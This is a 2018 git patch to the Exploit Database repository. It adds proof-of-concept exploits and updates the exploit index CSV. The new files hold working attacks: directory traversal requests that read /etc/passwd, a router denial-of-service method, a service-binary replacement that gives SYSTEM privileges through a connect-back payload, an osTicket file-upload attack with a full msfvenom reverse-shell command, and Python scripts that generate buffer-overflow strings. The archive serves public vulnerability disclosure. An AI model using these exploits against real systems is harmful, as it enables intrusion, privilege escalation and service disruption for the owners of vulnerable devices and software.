From 9d8170fd853c6a24437796b5e896f13c6a6966bd Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 9 Aug 2018 05:01:53 +0000 Subject: [PATCH] DB: 2018-08-09 9 changes to exploits/shellcodes TP-Link Wireless N Router WR840N - Denial of Service (PoC) Splinterware System Scheduler Pro 5.12 - Privilege Escalation iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow iSmartViewPro 1.5 - 'Account' Buffer Overflow OpenEMR < 5.0.1 - Remote Code Execution Kirby CMS 2.5.12 - Cross-Site Scripting osTicket 1.10.1 - Arbitrary File Upload LG-Ericsson iPECS NMS 30M - Directory Traversal LAMS < 3.1 - Cross-Site Scripting onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) Monstra 3.0.4 - Cross-Site Scripting LAMS < 3.1 - Cross-Site Scripting onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin) Monstra 3.0.4 - Cross-Site Scripting --- exploits/hardware/dos/45168.txt | 22 +++++++++ exploits/hardware/webapps/45021.txt | 1 + exploits/linux/webapps/45167.txt | 24 ++++++++++ exploits/php/webapps/45068.txt | 20 +++++++++ exploits/php/webapps/45154.html | 2 +- exploits/windows/local/45072.txt | 62 ++++++++++++++++++++++++++ exploits/windows/webapps/45169.txt | 31 +++++++++++++ exploits/windows_x86-64/local/45165.py | 29 ++++++++++++ exploits/windows_x86-64/local/45166.py | 28 ++++++++++++ files_exploits.csv | 15 +++++-- 10 files changed, 229 insertions(+), 5 deletions(-) create mode 100644 exploits/hardware/dos/45168.txt create mode 100644 exploits/linux/webapps/45167.txt create mode 100644 exploits/php/webapps/45068.txt create mode 100644 exploits/windows/local/45072.txt create mode 100644 exploits/windows/webapps/45169.txt create mode 100755 exploits/windows_x86-64/local/45165.py create mode 100755 exploits/windows_x86-64/local/45166.py diff --git a/exploits/hardware/dos/45168.txt b/exploits/hardware/dos/45168.txt new file mode 100644 index 000000000..6d7d9f27c --- /dev/null +++ b/exploits/hardware/dos/45168.txt @@ -0,0 +1,22 @@ +# Exploit Title:- TP-Link Wireless N Router WR840N - Denial of Service (PoC) +# Date: 2018-08-05 +# Vendor Homepage: https://www.tp-link.com/ +# Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q +# Version: TP-Link Wireless N Router WR840N +# Category: Hardware +# Exploit Author: Aniket Dinda +# Tested on: Windows 10 +# Web: https://hackingvila.wordpress.com +# CVE: N/A + +# Proof Of Concept: + +1- First connect to this network. +2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser. +3- Go to Quick setup. +4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string. +5- Now we paste a string consisting of 2000 zeros. +6- Then forward the connection. +7- Then your router automatically logout and net connection will be gone. + +You have to reboot your router before it becomes available again. \ No newline at end of file diff --git a/exploits/hardware/webapps/45021.txt b/exploits/hardware/webapps/45021.txt index 59a3dc5b9..4dcbbbadf 100644 --- a/exploits/hardware/webapps/45021.txt +++ b/exploits/hardware/webapps/45021.txt @@ -4,6 +4,7 @@ # Exploit Author: Safak Aslan # Software Link: http://www.celalink.com # Version: 2.7.1.6 +# CVE: 2018-15137 # Authentication Required: No # Tested on: Windows diff --git a/exploits/linux/webapps/45167.txt b/exploits/linux/webapps/45167.txt new file mode 100644 index 000000000..3130d8233 --- /dev/null +++ b/exploits/linux/webapps/45167.txt @@ -0,0 +1,24 @@ +# Exploit Title: LG-Ericsson iPECS NMS 30M - Directory Traversal +# Shodon Dork: iPECS CM +# Exploit Author: Safak Aslan +# Software Link: www.ipecs.com +# Version: 30M (System) +# Authentication Required: No +# Tested on: Linux +# CVE: N/A + +# Description +# The directory traversal was detected on LG-Ericsson's iPECS product that +# can be exploited to reach sensitive info on the vulnerable system. +# Ericsson-LG iPECS NMS 30M allows directory traversal via +# ipecs-cm/download?filename=../ URIs. + +# The GET input of the "filename" has been set to ../../../../../../../../../../etc/passwd. +# By the sending of the below GET request, it is possible to reach configuration files directly. + +targetIP/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data + +# The GET input of the "filepath" has been set to ../../../../../../../../../../etc/passwd%00.jpg. +# By the sending of the below GET request, it is possible to reach configuration files directly. + +targetIP/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg \ No newline at end of file diff --git a/exploits/php/webapps/45068.txt b/exploits/php/webapps/45068.txt new file mode 100644 index 000000000..fca0fe9d8 --- /dev/null +++ b/exploits/php/webapps/45068.txt @@ -0,0 +1,20 @@ +# Exploit Title:​​ Kirby CMS 2.5.12 - Cross-Site Scripting +# Date: 2018-07-22 +# Exploit Author: Zaran Shaikh +# Version: ​2.5.12 +# CVE : ​NA +# Category: ​Web Application + +# Description +# The application allows user injected payload which can lead to Stored +# Cross Site Scripting. + +# Proof of Concept +# 1. Visit the application as low priv user +# 2. Go to add page option +# 3. Under title, enter any XSS payload like: + + + +# 4. Upon the payload being injected, the subsequent page is triggered +# with XSS \ No newline at end of file diff --git a/exploits/php/webapps/45154.html b/exploits/php/webapps/45154.html index 244a61a36..612df387d 100644 --- a/exploits/php/webapps/45154.html +++ b/exploits/php/webapps/45154.html @@ -14,7 +14,7 @@ the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning t -
+ diff --git a/exploits/windows/local/45072.txt b/exploits/windows/local/45072.txt new file mode 100644 index 000000000..890628bc5 --- /dev/null +++ b/exploits/windows/local/45072.txt @@ -0,0 +1,62 @@ +# Exploit Title: Splinterware System Scheduler Pro 5.12 - Privilege Escalation +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 2018-07-21 +# Vulnerable Software: System Scheduler Pro 5.12 +# Vendor Homepage: https://www.splinterware.com +# Version: 5.12 +# Tested Windows 7 SP1 x86 +# CVE: N/A + +# Description: +# Splinterware System Scheduler Pro 5.12 suffers from +# Privilege Escalation due to insecure file permissions + +# Prerequisites +# To successfully exploit this vulnerability, the System Scheduler service must already be installed. + +# Details +# By default the Everyone group has the modify permission to System Schedule files as shown below. +# With the service installed, a low privilege account is able to rename the WService.exe file located in +# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service +# through the application, the service is checked periodically triggering the execution of the malicious file. + +C:\>icacls "c:\Program Files (x86)\SystemScheduler" +Everyone:(OI)(CI)(M) +NT SERVICE\TrustedInstaller:(I)(F) +NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) +NT AUTHORITY\SYSTEM:(I)(F) +NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) +BUILTIN\Administrators:(I)(F) +BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) +BUILTIN\Users:(I)(RX) +BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) +CREATOR OWNER:(I)(OI)(CI)(IO)(F) +APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) +APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + +C:\>sc qc WindowsScheduler +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WindowsScheduler + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : System Scheduler Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +# Proof of Concept +1. Login as regular user where Splinterware System Scheduler Pro 5.12 and the service are installed +2. Create malicious .exe with same name 'wservice.exe' that can connect back to attacking machine +3. Download malicious .exe on victim machine, and setup listener on attacking machine +4. Rename original wservice.exe file to wservice.bak, and copy malicious file to location of original +5. wait short amount of time and check attacking machine listener +6. connection back from victim machine successful, run whoami + +nt authority\system \ No newline at end of file diff --git a/exploits/windows/webapps/45169.txt b/exploits/windows/webapps/45169.txt new file mode 100644 index 000000000..d1d65f1af --- /dev/null +++ b/exploits/windows/webapps/45169.txt @@ -0,0 +1,31 @@ +# Exploit Title: osTicket 1.10.1 - Arbitrary File Upload +# Exploit Author: r3j10r (Rajwinder Singh) +# Date: 2018-08-08 +# Vendor Homepage: http://osticket.com/ +# Software Link: http://osticket.com/download +# Version: osTicket v1.10.1 +# CVE-2017-15580 + +# Vulnerability Details: +# osTicket application provides a functionality to upload 'html' files +# with associated formats. However, application does not properly validate +# the content of file and accepts any type of files. + +# Proof-of-Concept: +# Uploaded shell to get reverse shell of end user for the demo purpose. + +1. Created a valid '.html' file to bypass client-side validations. + + test + +

test page

+ + +2. Created a reverse shell with '.exe' file extension using msfvenom. +msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=4444 -b "\x00" -e -f exe -o reverse.exe +3. Intercepted the request in BurpSuite and changed file extension '.html' to '.exe' and its content +4. Received a valid response from server along with uploaded malicious file. +5. Got reverse shell after execution of the uploaded payload. + +# Affected Component: +Parameter: tickets.php?id=#reply \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45165.py b/exploits/windows_x86-64/local/45165.py new file mode 100755 index 000000000..4ea01f6d1 --- /dev/null +++ b/exploits/windows_x86-64/local/45165.py @@ -0,0 +1,29 @@ +# Exploit Title: iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow +# Author: Rodrigo Eduardo Rodriguez +# Discovery Date: 2018-08-07 +# Vendor Homepage: https://securimport.com/ +# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 +# Tested Version: 1.5 +# Vulnerability Type: Buffer Overflow Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the BoF: +# 1.- Run python code : python generatepaste.py +# 2.- Open generate.txt and copy content to clipboard +# 3.- Open iSmartViewPro +# 4.- clic button "+" +# 5.- Select "add device manually" +# 6.- paste ClipBoard on "Device Alias" +# 7.- DNS/IP/DID -> "0.0.0.0" +# 8.- acount -> "admin" +# 9.- password -> "admin" +# 10.- Save +# 11.- BoF + +#!/usr/bin/env python +# -*- coding: utf-8 -*- +buffer = "\x41" * 415 +eip = "\x42" * 4 +f = open ("generate.txt", "w") +f.write(buffer + eip) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45166.py b/exploits/windows_x86-64/local/45166.py new file mode 100755 index 000000000..571c0d24b --- /dev/null +++ b/exploits/windows_x86-64/local/45166.py @@ -0,0 +1,28 @@ +# Exploit Title: iSmartViewPro 1.5 - 'Account' Buffer Overflow +# Discovery by: Alan Joaquín Baeza Meza +# Discovery Date: 2018-08-07 +# Vendor Homepage: http://www.securimport.com/n/en/ +# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 +# Tested Version: 1.5 +# Tested on OS : Windows 10 Pro x64 es + +# Steps to Produce the BoF: +# 1.- Run python code : python generatepaste.py +# 2.- Open generate.txt and copy content to clipboard +# 3.- Open iSmartViewPro +# 4.- Add device manually +# 5.- Device alias -> A +# 6.- Device Type-> SmartP2P +# 7.- DDNS/IP/DID-> 0.0.0.0 +# 8.- Paste ClipBoard on "Account" +# 9.- Password -> A +#10.- Aceptar +#11.- BoF + +#!/usr/bin/env python +# -*- coding: utf-8 -*- +buffer = "\x41" * 479 +eip= "\x42" * 4 +f = open ("generate.txt", "w") +f.write(buffer+eip) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7417306e2..bf9056153 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6038,6 +6038,7 @@ id,file,description,date,author,type,platform,port 45121,exploits/multiple/dos/45121.txt,"WebRTC - VP8 Block Decoding Use-After-Free",2018-08-01,"Google Security Research",dos,multiple, 45122,exploits/multiple/dos/45122.txt,"WebRTC - FEC Processing Overflow",2018-08-01,"Google Security Research",dos,multiple, 45123,exploits/multiple/dos/45123.txt,"WebRTC - H264 NAL Packet Processing Type Confusion",2018-08-01,"Google Security Research",dos,multiple, +45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80 45162,exploits/windows_x86-64/dos/45162.py,"QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)",2018-08-07,"Rodrigo Eduardo Rodriguez",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, @@ -9841,6 +9842,7 @@ id,file,description,date,author,type,platform,port 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple, 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux, 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows, +45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows, 45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris, 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, @@ -9854,6 +9856,8 @@ id,file,description,date,author,type,platform,port 45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows, 45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux, 45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64, +45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64, +45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39703,7 +39707,7 @@ id,file,description,date,author,type,platform,port 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux, 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware, 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php, -45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php, +45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple, 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware, 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80 @@ -39729,6 +39733,7 @@ id,file,description,date,author,type,platform,port 45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php, 45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware, 45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php, +45068,exploits/php/webapps/45068.txt,"Kirby CMS 2.5.12 - Cross-Site Scripting",2018-07-23,"Zaran Shaikh",webapps,php, 45160,exploits/windows/webapps/45160.txt,"Open-AudIT Community 2.2.6 - Cross-Site Scripting",2018-08-06,"Ranjeet Jaiswal",webapps,windows, 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware, 45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux, @@ -39745,6 +39750,8 @@ id,file,description,date,author,type,platform,port 45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80 45131,exploits/php/webapps/45131.py,"CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection",2018-08-02,0x09AL,webapps,php, 45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml, +45169,exploits/windows/webapps/45169.txt,"osTicket 1.10.1 - Arbitrary File Upload",2018-08-08,"Rajwinder Singh",webapps,windows, +45167,exploits/linux/webapps/45167.txt,"LG-Ericsson iPECS NMS 30M - Directory Traversal",2018-08-08,"Safak Aslan",webapps,linux,80 45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware, 45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows, 45140,exploits/php/webapps/45140.txt,"Basic B2B Script 2.0.0 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80 @@ -39754,6 +39761,6 @@ id,file,description,date,author,type,platform,port 45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml, 45148,exploits/cgi/webapps/45148.txt,"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal",2018-08-03,"Google Security Research",webapps,cgi,80 45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php, -45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java, -45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php, -45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php, +45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080 +45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443 +45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80